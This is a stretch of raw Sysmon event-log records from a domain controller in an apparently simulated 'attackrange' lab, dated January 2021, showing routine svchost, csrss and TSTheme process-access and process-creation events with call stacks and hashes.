13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009770Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009769Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009768Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009767Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009766Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009765Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009764Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009763Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009762Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009761Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009760Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009759Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009758Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4753-6000-0B05-000000009A01}1384C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009757Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009756Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0B05-000000009A01}1384C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009755Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.142{08A6967A-4753-6000-0B05-000000009A01}1384C:\Windows\System32\TSTheme.exe10.0.14393.0 (rs1_release.160715-1616)TSTheme Server ModuleMicrosoft® Windows® Operating SystemMicrosoft CorporationTSThemeS.exeC:\Windows\system32\TSTheme.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=A9A89CB1838373C365F2B8AF72B1F1C2,SHA256=5EDB8F164B5CACAEFC551E3D0EA0971E5DA1AB144AB66FE429BC7E5DCB2FCC3C,IMPHASH=851EBF0BAEED8A212E02B93229FDC674{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000009754Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009753Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009752Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009751Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009750Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009749Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009748Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009747Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009746Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 